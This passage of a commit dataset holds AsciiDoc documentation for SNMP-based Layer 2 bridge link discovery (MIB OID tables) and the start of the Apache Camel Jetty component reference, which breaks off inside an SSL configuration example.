_dot1dStaticTable_) is being used to determine if and how frames addressed to the value of the corresponding instance of _dot1dTpFdbAddress_ are being forwarded. 
+\n *_invalid(2)_*: this entry is no longer valid (e.g., it was learned but has since aged-out), but has not yet been flushed from the table. +\n *_learned(3)_*: the value of the corresponding instance of _dot1dTpFdbPort_ was learned, and is being used. +\n *_self(4)_*: the value of the corresponding instance of _dot1dTpFdbAddress_ represents one of the bridge's addresses.\n The corresponding instance of _dot1dTpFdbPort_ indicates which of the bridge's ports has this address. +\n *_mgmt(5)_*: the value of the corresponding instance of dot1dTpFdbAddress is also the value of an existing instance of dot1dStaticAddress.\n|===\n\n.Supported OIDs from the Q-BRIDGE-MIB\n[options=\"header, autowidth\"]\n|===\n| Name | OID | Description\n| _dot1qTpFdbPort_ | `.1.3.6.1.2.1.17.7.1.2.2.1.2` | Either the value _0_, or the port number of the port on which a frame having a source address equal to the value of the corresponding instance of _dot1qTpFdbAddress_ has been seen.\n A value of _0_ indicates that the port number has not been learned but that the device does have some forwarding\/filtering information about this address (e.g., in the _dot1qStaticUnicastTable_).\n Implementors are encouraged to assign the port value to this object whenever it is learned, even for addresses for which the corresponding value of _dot1qTpFdbStatus_ is not _learned(3)_.\n| _dot1qTpFdbStatus_ | `.1.3.6.1.2.1.17.7.1.2.2.1.3` | The status of this entry.\n The meanings of the values are: +\n *_other(1)_*: none of the following.\n This may include the case where some other MIB object (not the corresponding instance of _dot1qTpFdbPort_, nor an entry in the _dot1qStaticUnicastTable_) is being used to determine if and how frames addressed to the value of the corresponding instance of _dot1qTpFdbAddress_ are being forwarded. +\n *_invalid(2)_*: this entry is no longer valid (e.g., it was learned but has since aged out), but has not yet been flushed from the table. +\n *_learned(3)_*: the value of the corresponding instance of _dot1qTpFdbPort_ was learned and is being used. +\n *_self(4)_*: the value of the corresponding instance of _dot1qTpFdbAddress_ represents one of the device's addresses.\n The corresponding instance of _dot1qTpFdbPort_ indicates which of the device's ports has this address. 
+\n *_mgmt(5)_*: the value of the corresponding instance of _dot1qTpFdbAddress_ is also the value of an existing instance of _dot1qStaticAddress_.\n|===\n\nGeneric information about the _bridge_ link discovery process can be found in the _Bridge Information_ box on the _Node Detail Page_ of the device.\nInformation gathered from this _OID_ will be stored in the following database table:\n\n.Database tables related to transparent bridge discovery\nimage::enlinkd\/bridge-database.png[]\n","old_contents":"\n\/\/ Allow GitHub image rendering\n:imagesdir: ..\/..\/..\/images\n\n==== Transparent Bridge Discovery\n\nDiscovering _Layer 2_ network links using the _Bridge Forwarding_ table requires a special algorithm.\nTo discover _Links_ an algorithm based on a scientific paper with the title link:http:\/\/cs-pub.bu.edu\/groups\/nrg\/readinglist\/lowekamp-sigcomm01.pdf[Topology Discovery for Large Ethernet Networks] is implemented.\nThe gathered information is used to classify _Links_ in _macLink_ and _bridgeLink_.\nA _macLink_ represents a _Link_ between a workstation or server identified by a mac address.\nA _bridgeLink_ is a _connection_ between backbone ports.\n\nTransparent bridging is not loop free so if you have loops you have to enable the spanning tree protocol that will detect loops and again will put some ports in a _blocking_ state to avoid loops.\nTo get links it is necessary to perform some calculations that let us define the _Links_.\nThe following _MIBS_ must be supported by the _SNMP agent_ to allow _Transparent Bridge Discovery_.\n\n.Supported MIBS from the Cisco-VTP MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _vtpVersion_ | `.1.3.6.1.4.1.9.9.46.1.1.1.0` | The version of VTP in use on the local system.\n A device will report its version capability and not any particular version in use on the device.\n If the device does not support _VTP_, the version is _none(3)_.\n|===\n\n.Supported MIBS from the IP-MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _ipNetToMediaIfIndex_ | `.1.3.6.1.2.1.4.22.1.1` | The interface on which this entry's equivalence is effective.\n The layer-2 interface identified by a particular value of this index is the same interface as identified by the same value of _ifIndex_.\n| _ipNetToMediaPhysAddress_ | `.1.3.6.1.2.1.4.22.1.2` | The media-dependent _physical_ address.\n| _ipNetToMediaNetAddress_ | `.1.3.6.1.2.1.4.22.1.3` | The _IpAddress_ corresponding to the media-dependent _physical_ address.\n| _ipNetToMediaType_ | `.1.3.6.1.2.1.4.22.1.4` | The type of mapping. 
Setting this object to the value _invalid(2)_ has the effect of invalidating the corresponding entry in the _ipNetToMediaTable_.\n That is, it effectively dissasociates the interface identified with said entry from the mapping identified with said entry.\n It is an implementation-specific matter as to whether the agent removes an invalidated entry from the table.\n Accordingly, management stations must be prepared to receive tabular information from agents that corresponds to entries not currently in use.\n Proper interpretation of such entries requires examination of the relevant _ipNetToMediaType_ object.\n|===\n\n.Supported OIDS from the BRIDGE-MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _dot1dBaseBridgeAddress_ | `.1.3.6.1.2.1.17.1.1.0` | The MAC address used by this bridge when it must be referred to in a unique fashion.\n It is recommended that this be the numerically smallest MAC address of all ports that belong to this bridge.\n However it is only required to be unique.\n When concatenated with _dot1dStpPriority_ a unique _BridgeIdentifier_ is formed which is used in the _Spanning Tree Protocol_.\n| _dot1dBaseNumPorts_ | `.1.3.6.1.2.1.17.1.2.0` | The number of ports controlled by this bridging entity.\n| _dot1dBaseType_ | `.1.3.6.1.2.1.17.1.3.0` | Indicates what type of bridging this bridge can perform.\n If a bridge is actually performing a certain type of bridging this will be indicated by entries in the port table for the given type.\n| _dot1dBasePort_ | `.1.3.6.1.2.1.17.1.4.1.1` | The port number of the port for which this entry contains bridge management information.\n| _dot1dPortIfIndex_ | `.1.3.6.1.2.1.17.1.4.1.2` | The value of the instance of the _ifIndex_ object, defined in _MIB-II_, for the interface corresponding to this port.\n| _dot1dStpProtocolSpecification_ | `.1.3.6.1.2.1.17.2.1.0` | An indication of what version of the Spanning Tree Protocol is being run.\n The value _decLb100(2)_ indicates the _DEC LANbridge 100 Spanning Tree protocol_.\n _IEEE 802.1d_ implementations will return _ieee8021d(3)_.\n If future versions of the _IEEE Spanning Tree Protocol_ are released that are incompatible with the current version a new value will be defined.\n| _dot1dStpPriority_ | `.1.3.6.1.2.1.17.2.2` | The value of the writeable portion of the _Bridge ID_, i.e., the first two octets of the (8 octet long) _Bridge ID_.\n The other (last) 6 octets of the _Bridge ID_ are given by the value of _dot1dBaseBridgeAddress_.\n| _dot1dStpDesignatedRoot_ | `.1.3.6.1.2.1.17.2.5` | The bridge identifier of the root of the spanning tree as determined by the _Spanning Tree Protocol_ as executed by this node.\n This value is used as the _Root Identifier_ parameter in all configuration _Bridge PDUs_ originated by this node.\n| _dot1dStpRootCost_ | `.1.3.6.1.2.1.17.2.6` | The cost of the path to the root as seen from this bridge.\n| _dot1dStpRootPort_ | `.1.3.6.1.2.1.17.2.7` | The port number of the port which offers the lowest cost path from this bridge to the root bridge.\n| _dot1dStpPort_ | `.1.3.6.1.2.1.17.2.15.1.1` | The port number of the port for which this entry contains Spanning Tree Protocol management information.\n| _dot1dStpPortPriority_ | `.1.3.6.1.2.1.17.2.15.1.2` | The value of the priority field which is contained in the first (in network byte order) octet of the (2 octet long) Port ID.\n The other octet of the Port ID is given by the value of _dot1dStpPort_.\n| _dot1dStpPortState_ | `.1.3.6.1.2.1.17.2.15.1.3` | The port's current state as defined by 
application of the _Spanning Tree Protocol_.\n This state controls what action a port takes on reception of a frame.\n If the bridge has detected a port that is malfunctioning it will place that port into the _broken(6)_ state.\n For ports which are disabled (see _dot1dStpPortEnable_), this object will have a value of _disabled(1)_.\n| _dot1dStpPortEnable_ | `.1.3.6.1.2.1.17.2.15.1.4` | The enabled\/disabled status of the port.\n| _dot1dStpPortPathCost_ | `.1.3.6.1.2.1.17.2.15.1.5` | The contribution of this port to the path cost of paths towards the spanning tree root which include this port.\n 802.1D-1990 recommends that the default value of this parameter be in inverse proportion to the speed of the attached LAN.\n| _dot1dStpPortDesignatedRoot_ | `.1.3.6.1.2.1.17.2.15.1.6` | The unique _Bridge Identifier_ of the _Bridge_ recorded as the _Root_ in the _Configuration BPDUs_ transmitted by the _Designated Bridge_ for the segment to which the port is attached.\n| _dot1dStpPortDesignatedCost_ | `.1.3.6.1.2.1.17.2.15.1.7` | The path cost of the _Designated Port_ of the segment connected to this port.\n This value is compared to the _Root Path Cost_ field in received bridge _PDUs_.\n| _dot1dStpPortDesignatedBridge_ | `.1.3.6.1.2.1.17.2.15.1.8` | The _Bridge Identifier_ of the bridge which this port considers to be the _Designated Bridge_ for this port's segment.\n| _dot1dStpPortDesignatedPort_ | `.1.3.6.1.2.1.17.2.15.1.9` | The _Port Identifier_ of the port on the _Designated Bridge_ for this port's segment.\n| _dot1dTpFdbAddress_ | `.1.3.6.1.2.1.17.4.3.1.1` | A unicast _MAC address_ for which the bridge has forwarding and\/or filtering information.\n| _dot1dTpFdbPort_ | `.1.3.6.1.2.1.17.4.3.1.2` | Either the value '0', or the port number of the port on which a frame having a source address equal to the value of the corresponding instance of _dot1dTpFdbAddress_ has been seen.\n A value of '0' indicates that the port number has not been learned but that the bridge does have some forwarding\/filtering information about this address (e.g. in the _dot1dStaticTable_).\n Implementors are encouraged to assign the port value to this object whenever it is learned even for addresses for which the corresponding value of _dot1dTpFdbStatus_ is not _learned(3)_.\n| _dot1dTpFdbStatus_ | `.1.3.6.1.2.1.17.4.3.1.3` | The status of this entry.\n The meanings of the values are: +\n *_other(1)_*: none of the following.\n This would include the case where some other _MIB_ object (not the corresponding instance of _dot1dTpFdbPort_, nor an entry in the _dot1dStaticTable_) is being used to determine if and how frames addressed to the value of the corresponding instance of _dot1dTpFdbAddress_ are being forwarded. +\n *_invalid(2)_*: this entry is not longer valid (e.g., it was learned but has since aged-out), but has not yet been flushed from the table. +\n *_learned(3)_*: the value of the corresponding instance of _dot1dTpFdbPort_ was learned, and is being used. +\n *_self(4)_*: the value of the corresponding instance of _dot1dTpFdbAddress_ represents one of the bridge's addresses.\n The corresponding instance of _dot1dTpFdbPort_ indicates which of the bridge's ports has this address. 
+\n *_mgmt(5)_*: the value of the corresponding instance of dot1dTpFdbAddress is also the value of an existing instance of dot1dStaticAddress.\n|===\n\n.Supported OIDS from the Q-BRIDGE-MIB\n[options=\"headers, autowidth\"]\n|===\n| Name | OID | Description\n| _dot1qTpFdbPort_ | `.1.3.6.1.2.1.17.7.1.2.2.1.2` | Either the value _0_, or the port number of the port on which a frame having a source address equal to the value of the corresponding instance of _dot1qTpFdbAddress_ has been seen.\n A value of _0_ indicates that the port number has not been learned but that the device does have some forwarding\/filtering information about this address (e.g., in the _dot1qStaticUnicastTable_).\n Implementors are encouraged to assign the port value to this object whenever it is learned, even for addresses for which the corresponding value of _dot1qTpFdbStatus_ is not _learned(3)_.\n| _dot1qTpFdbStatus_ | `.1.3.6.1.2.1.17.7.1.2.2.1.3` | The status of this entry.\n The meanings of the values are: +\n *_other(1)_*: none of the following.\n This may include the case where some other MIB object (not the corresponding instance of _dot1qTpFdbPort_, nor an entry in the _dot1qStaticUnicastTable_) is being used to determine if and how frames addressed to the value of the corresponding instance of _dot1qTpFdbAddress_ are being forwarded. +\n *_invalid(2)_*: this entry is no longer valid (e.g., it was learned but has since aged out), but has not yet been flushed from the table. +\n *_learned(3)_*: the value of the corresponding instance of _dot1qTpFdbPort_ was learned and is being used. +\n *_self(4)_*: the value of the corresponding instance of _dot1qTpFdbAddress_ represents one of the device's addresses.\n The corresponding instance of _dot1qTpFdbPort_ indicates which of the device's ports has this address. 
+\n *_mgmt(5)_*: the value of the corresponding instance of _dot1qTpFdbAddress_ is also the value of an existing instance of _dot1qStaticAddress_.\n|===\n\nGeneric information about the _bridge_ link discovery process can be found in the _Bridge Information_ box on the _Node Detail Page_ of the device.\nInformation gathered from this _OID_ will be stored in the following database table:\n\n.Database tables related to transparent bridge discovery\nimage::enlinkd\/bridge-database.png[]\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"e3842ea0a767d36881e593f0b6dd11bc0d457fec","subject":"Regen","message":"Regen\n","repos":"christophd\/camel,tadayosi\/camel,gnodet\/camel,pax95\/camel,christophd\/camel,pax95\/camel,cunningt\/camel,mcollovati\/camel,apache\/camel,mcollovati\/camel,mcollovati\/camel,adessaigne\/camel,apache\/camel,gnodet\/camel,DariusX\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,pmoerenhout\/camel,nicolaferraro\/camel,apache\/camel,cunningt\/camel,gnodet\/camel,christophd\/camel,nicolaferraro\/camel,apache\/camel,christophd\/camel,adessaigne\/camel,pax95\/camel,adessaigne\/camel,tdiesler\/camel,DariusX\/camel,apache\/camel,cunningt\/camel,DariusX\/camel,nikhilvibhav\/camel,tadayosi\/camel,gnodet\/camel,nikhilvibhav\/camel,tdiesler\/camel,tadayosi\/camel,tdiesler\/camel,mcollovati\/camel,gnodet\/camel,nicolaferraro\/camel,adessaigne\/camel,DariusX\/camel,nikhilvibhav\/camel,alvinkwekel\/camel,tadayosi\/camel,tdiesler\/camel,tdiesler\/camel,nikhilvibhav\/camel,tadayosi\/camel,cunningt\/camel,DariusX\/camel,nicolaferraro\/camel,pax95\/camel,cunningt\/camel,cunningt\/camel,christophd\/camel,alvinkwekel\/camel,pax95\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,pax95\/camel,tdiesler\/camel,apache\/camel,tadayosi\/camel,adessaigne\/camel,nicolaferraro\/camel","old_file":"docs\/components\/modules\/ROOT\/pages\/jetty-component.adoc","new_file":"docs\/components\/modules\/ROOT\/pages\/jetty-component.adoc","new_contents":"[[jetty-component]]\n= Jetty Component\n:page-source: components\/camel-jetty\/src\/main\/docs\/jetty-component.adoc\n\n*Since Camel 1.2*\n\n\/\/ HEADER START\n*Only consumer is supported*\n\/\/ HEADER END\n\nThe Jetty component provides HTTP-based endpoints\nfor consuming and producing HTTP requests. That is, the Jetty component\nbehaves as a simple Web server.\n\n*Stream*\n\nJetty is stream based, which means the input it receives is\nsubmitted to Camel as a stream. That means you will only be able to read\nthe content of the stream *once*. +\nIf you find a situation where the message body appears to be empty or\nyou need to access the Exchange.HTTP_RESPONSE_CODE data multiple times\n(e.g. when doing multicasting or redelivery error handling), you should use\nStream caching or convert the message body to\na `String` which is safe to be re-read multiple times.
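\n\nAs an illustration, a route might defensively convert the body to a `String` right after the consumer. This is only a minimal sketch; the endpoint URI and the `mock:result` endpoint are placeholders:\n\n[source,java]\n----\nfrom(\"jetty:http:\/\/0.0.0.0:8080\/myapp\/myservice\")\n    \/\/ read the request stream once and replace the body with a re-readable String\n    .convertBodyTo(String.class)\n    .to(\"mock:result\");\n----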
\n\nMaven users will need to add the following dependency to their `pom.xml`\nfor this component:\n\n[source,xml]\n----\n<dependency>\n <groupId>org.apache.camel<\/groupId>\n <artifactId>camel-jetty<\/artifactId>\n <version>x.x.x<\/version>\n <!-- use the same version as your Camel core version -->\n<\/dependency>\n----\n\n== URI format\n\n[source,text]\n----\njetty:http:\/\/hostname[:port][\/resourceUri][?options]\n----\n\nYou can append query options to the URI in the following format,\n`?option=value&option=value&...`\n\n== Options\n\n\n\n\n\n\/\/ component options: START\nThe Jetty component supports 32 options, which are listed below.\n\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which means any exceptions that occurred while the consumer was trying to pick up incoming messages, or the like, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions; they will be logged at WARN or ERROR level and ignored. | false | boolean\n| *continuationTimeout* (consumer) | Allows setting a timeout in millis when using Jetty as a consumer (server). By default Jetty uses 30000. You can use a value of 0 or lower to never expire. If a timeout occurs then the request will be expired and Jetty will return back an HTTP error 503 to the client. This option is only in use when using Jetty with the Asynchronous Routing Engine. | 30000 | Long\n| *enableJmx* (consumer) | If this option is true, Jetty JMX support will be enabled for this endpoint. | false | boolean\n| *maxThreads* (consumer) | To set a value for maximum number of threads in server thread pool. Notice that both a min and max size must be configured. | | Integer\n| *minThreads* (consumer) | To set a value for minimum number of threads in server thread pool. Notice that both a min and max size must be configured. | | Integer\n| *requestBufferSize* (consumer) | Allows configuring a custom value of the request buffer size on the Jetty connectors. | | Integer\n| *requestHeaderSize* (consumer) | Allows configuring a custom value of the request header size on the Jetty connectors. | | Integer\n| *responseBufferSize* (consumer) | Allows configuring a custom value of the response buffer size on the Jetty connectors. | | Integer\n| *responseHeaderSize* (consumer) | Allows configuring a custom value of the response header size on the Jetty connectors. | | Integer\n| *sendServerVersion* (consumer) | If the option is true, Jetty will send the server header with the Jetty version information to the client which sends the request. NOTE: please make sure that no other camel-jetty endpoint shares the same port, otherwise this option may not work as expected. | true | boolean\n| *useContinuation* (consumer) | Whether or not to use Jetty continuations for the Jetty Server. | true | boolean\n| *useXForwardedForHeader* (consumer) | To use the X-Forwarded-For header in HttpServletRequest.getRemoteAddr. 
| false | boolean\n| *threadPool* (consumer) | To use a custom thread pool for the server. This option should only be used in special circumstances. | | ThreadPool\n| *allowJavaSerializedObject* (advanced) | Whether to allow java serialization when a request uses content-type=application\/x-java-serialized-object. This is by default turned off. If you enable this then be aware that Java will deserialize the incoming data from the request to Java and that can be a potential security risk. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the component should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *errorHandler* (advanced) | This option is used to set the ErrorHandler that Jetty server uses. | | ErrorHandler\n| *httpBinding* (advanced) | Not to be used - use JettyHttpBinding instead. | | HttpBinding\n| *httpConfiguration* (advanced) | Jetty component does not use HttpConfiguration. | | HttpConfiguration\n| *jettyHttpBinding* (advanced) | To use a custom org.apache.camel.component.jetty.JettyHttpBinding, which is used to customize how a response should be written for the producer. | | JettyHttpBinding\n| *mbContainer* (advanced) | To use an existing configured org.eclipse.jetty.jmx.MBeanContainer if JMX is enabled that Jetty uses for registering mbeans. | | MBeanContainer\n| *headerFilterStrategy* (filter) | To use a custom org.apache.camel.spi.HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *proxyHost* (proxy) | To use an HTTP proxy to configure the hostname. | | String\n| *proxyPort* (proxy) | To use an HTTP proxy to configure the port number. | | Integer\n| *keystore* (security) | Specifies the location of the Java keystore file, which contains the Jetty server's own X.509 certificate in a key entry. | | String\n| *socketConnectorProperties* (security) | A map which contains general HTTP connector properties. Uses the same principle as sslSocketConnectorProperties. | | Map\n| *socketConnectors* (security) | A map which contains per port number specific HTTP connectors. Uses the same principle as sslSocketConnectors. | | Map\n| *sslContextParameters* (security) | To configure security using SSLContextParameters | | SSLContextParameters\n| *sslKeyPassword* (security) | The key password, which is used to access the certificate's key entry in the keystore (this is the same password that is supplied to the keystore command's -keypass option). | | String\n| *sslPassword* (security) | The ssl password, which is required to access the keystore file (this is the same password that is supplied to the keystore command's -storepass option). | | String\n| *sslSocketConnectorProperties* (security) | A map which contains general SSL connector properties. | | Map\n| *sslSocketConnectors* (security) | A map which contains per port number specific SSL connectors. | | Map\n| *useGlobalSslContextParameters* (security) | Enable usage of global SSL context parameters | false | boolean\n|===\n\/\/ component options: END\n\n\n\n\n\n\n\n\n\/\/ endpoint options: START\nThe Jetty endpoint is configured using URI syntax:\n\n----\njetty:httpUri\n----\n\nwith the following path and query parameters:\n\n=== Path Parameters (1 parameter):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *httpUri* | *Required* The URL of the HTTP endpoint to call. | | URI\n|===
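\n\nAs a quick illustration before the query parameter reference below, a consumer endpoint URI that combines the path with a few of the query options might look like this (host, port, and context path are placeholder values):\n\n[source,text]\n----\njetty:http:\/\/0.0.0.0:8080\/myapp\/myservice?matchOnUriPrefix=true&sessionSupport=true\n----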
\n\n=== Query Parameters (34 parameters):\n\n\n[width=\"100%\",cols=\"2,5,^1,2\",options=\"header\"]\n|===\n| Name | Description | Default | Type\n| *disableStreamCache* (common) | Determines whether or not the raw input stream from Servlet is cached or not (Camel will read the stream into a in memory\/overflow to file, Stream caching) cache. By default Camel will cache the Servlet input stream to support reading it multiple times to ensure that Camel can retrieve all data from the stream. However, you can set this option to true when you, for example, need to access the raw stream, such as streaming it directly to a file or other persistent store. DefaultHttpBinding will copy the request input stream into a stream cache and put it into the message body if this option is false, to support reading the stream multiple times. If you use Servlet to bridge\/proxy an endpoint then consider enabling this option to improve performance, in case you do not need to read the message payload multiple times. The http producer will by default cache the response body stream. If setting this option to true, then the producers will not cache the response body stream but use the response stream as-is as the message body. | false | boolean\n| *headerFilterStrategy* (common) | To use a custom HeaderFilterStrategy to filter header to and from Camel message. | | HeaderFilterStrategy\n| *httpBinding* (common) | To use a custom HttpBinding to control the mapping between Camel message and HttpClient. | | HttpBinding\n| *async* (consumer) | Configure the consumer to work in async mode | false | boolean\n| *bridgeErrorHandler* (consumer) | Allows for bridging the consumer to the Camel routing Error Handler, which means any exceptions that occurred while the consumer was trying to pick up incoming messages, or the like, will now be processed as a message and handled by the routing Error Handler. By default the consumer will use the org.apache.camel.spi.ExceptionHandler to deal with exceptions; they will be logged at WARN or ERROR level and ignored. | false | boolean\n| *chunked* (consumer) | If this option is false, the Servlet will disable HTTP streaming and set the content-length header on the response | true | boolean\n| *continuationTimeout* (consumer) | Allows setting a timeout in millis when using Jetty as a consumer (server). By default Jetty uses 30000. You can use a value of 0 or lower to never expire. If a timeout occurs then the request will be expired and Jetty will return back an HTTP error 503 to the client. This option is only in use when using Jetty with the Asynchronous Routing Engine. | 30000 | Long\n| *enableCORS* (consumer) | If the option is true, the Jetty server will set up the CrossOriginFilter, which supports CORS out of the box. | false | boolean\n| *enableJmx* (consumer) | If this option is true, Jetty JMX support will be enabled for this endpoint. See Jetty JMX support for more details. | false | boolean\n| *enableMultipartFilter* (consumer) | Whether org.apache.camel.component.jetty.MultiPartFilter is enabled or not. You should set this value to false when bridging endpoints, to ensure multipart requests are proxied\/bridged as well. | false | boolean\n| *httpMethodRestrict* (consumer) | Used to only allow consuming if the HttpMethod matches, such as GET\/POST\/PUT etc. Multiple methods can be specified separated by comma. | | String\n| *matchOnUriPrefix* (consumer) | Whether or not the consumer should try to find a target consumer by matching the URI prefix if no exact match is found. 
| false | boolean\n| *muteException* (consumer) | If enabled and an Exchange failed processing on the consumer side the response's body won't contain the exception's stack trace. | false | boolean\n| *responseBufferSize* (consumer) | To use a custom buffer size on the javax.servlet.ServletResponse. | | Integer\n| *sendDateHeader* (consumer) | If the option is true, the Jetty server will send the date header to the client which sends the request. NOTE: please make sure that no other camel-jetty endpoint shares the same port, otherwise this option may not work as expected. | false | boolean\n| *sendServerVersion* (consumer) | If the option is true, Jetty will send the server header with the Jetty version information to the client which sends the request. NOTE: please make sure that no other camel-jetty endpoint shares the same port, otherwise this option may not work as expected. | true | boolean\n| *sessionSupport* (consumer) | Specifies whether to enable the session manager on the server side of Jetty. | false | boolean\n| *transferException* (consumer) | If enabled and an Exchange failed processing on the consumer side, the caused Exception is sent back serialized in the response as an application\/x-java-serialized-object content type. On the producer side the exception will be deserialized and thrown as is, instead of the HttpOperationFailedException. The caused exception is required to be serialized. This is by default turned off. If you enable this then be aware that Java will deserialize the incoming data from the request to Java and that can be a potential security risk. | false | boolean\n| *useContinuation* (consumer) | Whether or not to use Jetty continuations for the Jetty Server. | | Boolean\n| *eagerCheckContentAvailable* (consumer) | Whether to eagerly check whether the HTTP request has content if the content-length header is 0 or not present. This can be turned on in case HTTP clients do not send streamed data. | false | boolean\n| *exceptionHandler* (consumer) | To let the consumer use a custom ExceptionHandler. Notice if the option bridgeErrorHandler is enabled then this option is not in use. By default the consumer will deal with exceptions; they will be logged at WARN or ERROR level and ignored. | | ExceptionHandler\n| *exchangePattern* (consumer) | Sets the exchange pattern when the consumer creates an exchange. The value can be one of: InOnly, InOut, InOptionalOut | | ExchangePattern\n| *filterInitParameters* (consumer) | Configuration of the filter init parameters. These parameters will be applied to the filter list before starting the jetty server. | | Map\n| *filters* (consumer) | Allows using custom filters, which are put into a list and can be found in the Registry. Multiple values can be separated by comma. | | List\n| *handlers* (consumer) | Specifies a comma-delimited set of Handler instances to lookup in your Registry. These handlers are added to the Jetty servlet context (for example, to add security). Important: You can not use different handlers with different Jetty endpoints using the same port number. The handlers are associated with the port number. If you need different handlers, then use different port numbers. | | List\n| *multipartFilter* (consumer) | Allows using a custom multipart filter. Note: setting multipartFilterRef forces the value of enableMultipartFilter to true. | | Filter\n| *optionsEnabled* (consumer) | Specifies whether to enable HTTP OPTIONS for this Servlet consumer. By default OPTIONS is turned off. 
| false | boolean\n| *traceEnabled* (consumer) | Specifies whether to enable HTTP TRACE for this Servlet consumer. By default TRACE is turned off. | false | boolean\n| *basicPropertyBinding* (advanced) | Whether the endpoint should use basic property binding (Camel 2.x) or the newer property binding with additional capabilities | false | boolean\n| *mapHttpMessageBody* (advanced) | If this option is true then IN exchange Body of the exchange will be mapped to HTTP body. Setting this to false will avoid the HTTP mapping. | true | boolean\n| *mapHttpMessageFormUrlEncodedBody* (advanced) | If this option is true then IN exchange Form Encoded body of the exchange will be mapped to HTTP. Setting this to false will avoid the HTTP Form Encoded body mapping. | true | boolean\n| *mapHttpMessageHeaders* (advanced) | If this option is true then IN exchange Headers of the exchange will be mapped to HTTP headers. Setting this to false will avoid the HTTP Headers mapping. | true | boolean\n| *synchronous* (advanced) | Sets whether synchronous processing should be strictly used, or Camel is allowed to use asynchronous processing (if supported). | false | boolean\n| *sslContextParameters* (security) | To configure security using SSLContextParameters | | SSLContextParameters\n|===\n\/\/ endpoint options: END\n\n\n\n\n== Message Headers\n\nCamel uses the same message headers as the xref:http-component.adoc[HTTP]\ncomponent.\nIt also uses the `Exchange.HTTP_CHUNKED` (`CamelHttpChunked`)\nheader to turn the chunked encoding on or off on the camel-jetty\nconsumer.\n\nCamel also populates *all* request.parameter and request.headers. For\nexample, given a client request with the URL,\n`\\http:\/\/myserver\/myserver?orderid=123`, the exchange will contain a\nheader named `orderid` with the value 123.\n\nYou can get the request parameters from the message headers not only for the\nGET method, but for other HTTP methods as well.\n\n== Usage\n\nThe Jetty component supports consumer endpoints.\n\n== Consumer Example\n\nIn this sample we define a route that exposes an HTTP service at\n`\\http:\/\/localhost:8080\/myapp\/myservice`:\n\n*Usage of localhost*\n\nWhen you specify `localhost` in a URL, Camel exposes the endpoint only\non the local TCP\/IP network interface, so it cannot be accessed from\noutside the machine it operates on.\n\nIf you need to expose a Jetty endpoint on a specific network interface,\nthe numerical IP address of this interface should be used as the host.\nIf you need to expose a Jetty endpoint on all network interfaces, the\n`0.0.0.0` address should be used.\n\nTo listen across an entire URI prefix, see\nxref:manual:faq:how-do-i-let-jetty-match-wildcards.adoc[How do I let Jetty match wildcards].\n\nIf you actually want to expose routes by HTTP and already have a\nServlet, you should instead refer to the\nxref:servlet-component.adoc[Servlet Transport].\n\nOur business logic is implemented in the `MyBookService` class, which\naccesses the HTTP request contents and then returns a response. +\n *Note:* The `assert` call appears in this example, because the code is\npart of a unit test.\n\nThe following sample shows a content-based route that routes all\nrequests containing the URI parameter, `one`, to the endpoint,\n`mock:one`, and all others to `mock:other`.\n\nSo if a client sends the HTTP request, `\\http:\/\/serverUri?one=hello`, the\nJetty component will copy the HTTP request parameter `one` to the\nexchange's `in.header`.
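\n\nA minimal sketch of such a route in the Java DSL might look like the following (the URI and the `mock:` endpoints mirror the description above; this sketch uses the `header()` predicate, while the text below notes that the `simple` language could be used as well):\n\n[source,java]\n----\nfrom(\"jetty:http:\/\/0.0.0.0:8080\/myapp\/myservice\")\n    .choice()\n        \/\/ requests carrying the URI parameter \"one\" go to mock:one\n        .when(header(\"one\").isNotNull())\n            .to(\"mock:one\")\n        \/\/ everything else goes to mock:other\n        .otherwise()\n            .to(\"mock:other\");\n----\n\n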
We can then use the `simple` language to route\nexchanges that contain this header to a specific endpoint and all others\nto another. If we used a language more powerful than\nxref:languages:simple-language.adoc[Simple] (such as xref:languages:ognl-language.adoc[OGNL])\nwe could also test for the parameter value and do routing based on the\nheader value as well.\n\n== Session Support\n\nThe session support option, `sessionSupport`, can be used to enable a\n`HttpSession` object and access the session object while processing the\nexchange. For example, the following route enables sessions:\n\n[source,xml]\n----\n<route>\n <from uri=\"jetty:http:\/\/0.0.0.0\/myapp\/myservice\/?sessionSupport=true\"\/>\n <processRef ref=\"myCode\"\/>\n<\/route>\n----\n\nThe `myCode` Processor can be instantiated by a\nSpring `bean` element:\n\n[source,xml]\n----\n<bean id=\"myCode\" class=\"com.mycompany.MyCodeProcessor\"\/>\n----\n\nWhere the processor implementation can access the `HttpSession` as\nfollows:\n\n[source,java]\n----\npublic void process(Exchange exchange) throws Exception {\n HttpSession session = exchange.getIn(HttpMessage.class).getRequest().getSession();\n ...\n}\n----\n\n== SSL Support (HTTPS)\n\n[[Jetty-UsingtheJSSEConfigurationUtility]]\nUsing the JSSE Configuration Utility\n\nThe Jetty component supports SSL\/TLS configuration\nthrough the xref:manual::camel-configuration-utilities.adoc[Camel JSSE\nConfiguration Utility]. This utility greatly decreases the amount of\ncomponent specific code you need to write and is configurable at the\nendpoint and component levels. The following examples demonstrate how\nto use the utility with the Jetty component.\n\n[[Jetty-Programmaticconfigurationofthecomponent]]\nProgrammatic configuration of the component\n\n[source,java]\n----\nKeyStoreParameters ksp = new KeyStoreParameters();\nksp.setResource(\"\/users\/home\/server\/keystore.jks\");\nksp.setPassword(\"keystorePassword\");\n\nKeyManagersParameters kmp = new KeyManagersParameters();\nkmp.setKeyStore(ksp);\nkmp.setKeyPassword(\"keyPassword\");\n\nSSLContextParameters scp = new SSLContextParameters();\nscp.setKeyManagers(kmp);\n\nJettyComponent jettyComponent = 